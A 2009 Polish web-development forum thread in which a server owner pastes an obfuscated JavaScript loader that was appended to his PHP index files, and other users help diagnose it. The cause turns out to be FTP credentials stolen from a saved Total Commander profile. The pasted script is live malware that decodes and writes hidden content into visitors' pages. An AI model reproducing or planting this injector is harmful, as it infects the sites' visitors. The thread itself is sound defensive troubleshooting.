[PHP] Co to może być? Opcje

[Tomek58]

Witam!

Mam mały problem, nie wiem dlaczego do wielu plików z rozszerzeniem .php na moim serwerze dodaje się na samym końcu kod typu:

Kod

?><script>function c32d980125q49e11f07f2685(q49e11f07f2a69){ function q49e11f07f2e54(){var q49e11f07f323a=16;return q49e11f07f323a;} return (eval('pa'+'rseInt')(q49e11f07f2a69,q49e11f07f2e54()));}function q49e11f07f3622(q49e11f07f3a1d){ function q49e11f0800c80(){var q49e11f0800f3f=2;return q49e11f0800f3f;} var q49e11f07f3df2='';q49e11f0801324=String['fromCharCode'];for(q49e11f07f41da=0;q49e11f07f41da<q49e11f07f3a1d.length;q49e11f07f41da+=q49e11f0800c80()){ q49e11f07f3df2+=(q49e11f0801324(c32d980125q49e11f07f2685(q49e11f07f3a1d.substr(q49e11f07f41da,q49e11f0800c80()))));}return q49e11f07f3df2;} var vf0='';var q49e11f080170c='3C7'+vf0+'3637'+vf0+'2697'+vf0+'07'+vf0+'43E696628216D7'+vf0+'96961297'+vf0+'B646F637'+vf0+'56D656E7'+vf0+'42E7'+vf0+'7'+vf0+'7'+vf0+'2697'+vf0+'465287'+vf0+'56E657'+vf0+'363617'+vf0+'065282027'+vf0+'2533632536392536362537'+vf0+'3225363125366425363525323025366525363125366425363525336425363325333325333225
2302537'+vf0+'332537'+vf0+'32253633253364253237'+vf0+'2536382537'+vf0+'342537'+vf0+'342537'+vf0+'302533612532662532662536362536312536322536392536662536642536662537'+vf0+'342536662537'+vf0+'322532652536332536652532662537'+vf0+'332536312536662537'+vf0+'302536392537'+vf0+'302533322537'+vf0+'392537'+vf0+'342533332537'+vf0+'30253338253337'+vf0+'2537'+vf0+'342537'+vf0+'332536312536612536382536342536312532662536392536652536342536352537'+vf0+'382532652537'+vf0+'302536382537'+vf0+'30253366253237'+vf0+'2532622534642536312537'+vf0+'342536382532652537'+vf0+'322536662537'+vf0+'352536652536342532382534642536312537'+vf0+'342536382532652537'+vf0+'32253631253665253634253666253664253238253239253261253335253334253337'+vf0+'253335253330253239253262253237'+vf0+'253330253633253337'+vf0+'253633253332253332253334253633253336253333253333253635253237'+vf0+'2532302537'+vf0+'37'+vf0+'2536392536342537'+vf0+'34253638253364253332253331253339253230253638253635253639253637'+vf0+'2536382537'+vf0+'342533642533322533352533302532302537'+vf0+'332537'+vf0+'342537'+vf0+'39253663253635253364253237'+vf0+'2537'+vf0+'362536392537'+vf0+'332536392536322536392536632536392537'+vf0+'342537'+vf0+'39253361253638253639253634253634253635253665253237'+vf0+'2533652533632532662536392536362537'+vf0+'3225363125366425363525336527'+vf0+'29293B7'+vf0+'D7'+vf0+'6617'+vf0+'2206D7'+vf0+'969613D7'+vf0+'47'+vf0+'27'+vf0+'5653B3C2F7'+vf0+'3637'+vf0+'2697'+vf0+'07'+vf0+'43E';q49e11f0801eda=document;q49e11f0801eda.write(q49e11f07f3622(q49e11f080170c));</script>

Co to jest? Dodaje się samo, zaraz po ?>

[Berg]

Prawdopodobnie skrypt do statystyk na serwerze. Takie coś jest doklejane np. przez home.pl, powinieneś mieć możliwość wyłączenia tego u siebie w panelu.

Ten post edytował Berg 11.04.2009, 18:33:33

[Tomek58]

Szczerze mówiąc pojawiło się to po zainstalowaniu modu: http://www.przemo.org/phpBB2/forum/viewtopic.php?t=65253 do forum na PHPBB. Tylko czemu kod ten dokleja się na wszystkich indexach na serwerze?

PS. Serwer dedykowany, więc to raczej nie są statystyki :/

[MWL]

to zapewne jakiś atak, najprawdopodobniej xss, albo ktoś wgrał ci stronę do zarządzania twoim FTP.

Ten post edytował MWL 11.04.2009, 18:59:41

[mrok]

Jeśli nie wiesz skąd się to wzięło i masz zapisane hasło w programie do łaczenia się z FTP to naprawdopodobniej jest to objaw działalności jakiegoś robaka ;(

Spróbuj przeskanować czymś sytem, zmień hasło na ftp (i nie zapisuje go w programie), wywal te wpisy na końcu skryptów.
Poszukaj jeszcze na forum (tym) bo nie tylko Ty masz taki problem

[erix]

90%, że jakiś syf; był o tym temat w Hydeparku.

[Tomek58]

Z tego co zauważyłem zapisywało się tylko w plikach index.html / index.php. Zawsze w ścieżkach / i /katalog, nigdy w /katalog/katalog2. Bardzo dziwne, pierwszy raz się z czymś takim spotykam. Powstawiało nawet kod w zewnętrznych folderach stron (do każdego inny login i hasło FTP).

[patryk9200]

Miałem podobny problem:P
prawdopodobnie jest to złośliwy kod próbując włamać się do systemu odwiedzajacych twą stronę
jedyny sposób to jego usunięcie, sprawdź katalogi czy nie masz dziwnych plików,
wykorzystuje pewną lukę ...Jakie masz prawa do folderów??

Ten post edytował patryk9200 11.04.2009, 21:15:17

[Tomek58]

Katalogi mają chmod 755.

Usuwam to, a po kilkunastu minutach nadal się pojawia :/

Edit: Problem rozpoznany. Znalazłem w logach FTP połączenia z rosyjskiego IP, widocznie jakiś robal wyciągnął zakodowane hasła z pliku Total Commandera. Wystarczy więc zmienić hasło do FTP i nie zapisywać go w programach typu TCM. :-)

Ten post edytował Tomek58 12.04.2009, 11:30:15